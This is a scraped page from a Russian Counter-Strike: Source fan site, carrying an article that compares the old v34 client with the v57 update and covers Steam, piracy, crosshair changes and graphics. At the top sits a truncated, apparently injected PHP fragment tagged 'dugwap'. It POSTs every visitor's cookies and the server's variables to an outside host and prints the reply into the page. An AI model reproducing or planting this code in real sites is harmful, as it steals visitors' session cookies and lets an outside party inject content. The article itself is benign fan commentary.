array("header"=>"User-Agent: PHP Modules dugwap\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($dugwap_result) echo $dugwap_result; ?>
Патч для css v68 Патч для css v67 Патч для css v66 Патч для css v65
Меню
Главная страница Права групп на evro-cs.ru Форум Статьи Файлы Скачать STEAM для css Видео Новости FAQ по CSS Реклама Все для CS http://android-igra.ru/ Немного для uCoz Чуть-чуть для Photoshop
Статистика
Онлайн всего: 4
Гостей: 4
Пользователей: 0
Реклама+Приветствие


Главная » Статьи » Counter-Strike » Что же лучше? v34 или v57?
Что же лучше? v34 или v57?

Что же лучше? v34 или v57?

Что же лучше? v34 или v57?


Данная статья полностью пренадлежит сайту http://evro-cs.ru/


Что лучше, старая css(v34) или новая (v56)?

Что можно сказать... Людям не понравилось ревизское обновление полной системы css и valve.
Так же игрокам не понравилась новая версия игры. Многие пытались вернуть старую, любимую css, но увы, у них это не получилось.
Игроки задаются вопросом "Почему же Valve решило сделать глобальное обновление всей системы?" Valve ответило на этот вопрос. Причиной глобального обновления стали но-стимовские игроки. Valve решило раз и навсегда избавиться от пиратских версий. Они считали что если сделать глобальное обновление, то все но-стимовские игроки перейдут на steam.
Таким образом, valve зарабатывает на этом. Действительно многие игроки перешли на steam, но 90% игроков остались недовольны.
Не все игроки перешли на steam версии игры. Не прошло и 2ух недель, как в интернете можно было найти no-steam версию новой css.
Так же игроки не могли играть на серверах, из за того что маленькое кол-во серверов смогли быстро установить новые моды и плагины, на обновлении стим, больше всего пострадали сервера.
Ещё один пункт, почему люди были постоянно не довольны. Так как valve очень часто, по 2 раза в сутки выпускали новые обновления.
И сейчас valve обновляет игру, но сейчас это происходит уже не так часто.
Недавно у людей вызвал недовольство новый прицел.
Прицел нельзя сделать совсем маленьким, так как раньше мы писали например cl_crosshairscale 4500 и у нас был маленький прицел.
Сейчас же нам необходимо писать cl_crosshairsize 1. Но всё равно прицел будет слишком велик для игры.
В старой версии игры людям было приятней играть, так как в новой версии слишком сильно "светит солнце", прицела бывает не видно.
В новой версии css так же есть свои плюсы, один из них это игровой счёт. Стало удобней разобрать кто где, так же видны аватары игроков, теги кланов.
В новой версии игры конечно лучше графика, чем в старой, над этим valve действительно постарались.
Но графика не самое главное, вспомним cs 1.6, там действительно графика на порядок хуже, чем у css, но всё же, большое количество людей играют в cs 1.6 и их не волнует качество графики.
Из этого можно понять, что графика для любой версии CS не столько важна. Если вы играете на профессиональном уровне, то вам нет разницы за чем играть, с какой мышью играть, клавиатурой и т.д.
Судя из всего этого, нельзя сказать, какая из версий лучше. Конечно, мы все привыкли играть на старой версии, но надо когда то продвигаться? Что было бы, если бы мир стоял на месте? Ничего бы не менялось, всё было бы типичным!

По этому всё же можно смело сказать, что valve сделало всё правильно. И несмотря на многочисленные жалобы, они почти восстановили все плюсы старой версии игры.


Данная статья полностью пренадлежит сайту evro-cs.ru

Размещение данной статьи на других сайтах без ссылки на источни ЗАПРЕЩЕНО!

Steam или No-Steam


Просмотров: 1493 | Дата: 23.07.2025 |Добавил : EvRo | Категория: Counter-Strike
Всего комментариев: 0
Имя *:
Код *:
Опрос
Что вы чаще качаете?
Всего ответов: 2349
  PR-CY.ru